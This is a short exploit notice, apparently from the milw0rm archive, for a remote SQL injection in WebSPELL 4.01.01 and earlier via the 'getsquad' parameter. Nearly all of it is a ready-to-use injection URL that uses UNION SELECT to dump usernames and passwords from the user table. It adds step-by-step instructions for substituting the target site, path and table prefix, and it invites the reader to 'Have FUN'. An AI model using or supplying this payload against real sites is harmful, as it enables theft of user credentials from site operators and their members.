# WebSPELL <= 4.01.01 (getsquad) Remote SQL Injection Exploit # by: Kiba #EXPLOIT: http://[PAGE]/[PATH]/index.php?site=squads&getsquad=Where+1=0+Union+Select+1,1,username,1,password,1+from+[PREFIX]_user/* #REPLACE: (if the website is http://yourwebsite.de/webspell/index.php) [PAGE] with "yourwebsite.de" [PATH] with "webspell" (if there is no subdirectory then remove it) [PREFIX] the Prefix of the database tables (try "webs_user") # Have FUN # milw0rm.com [2006-10-15]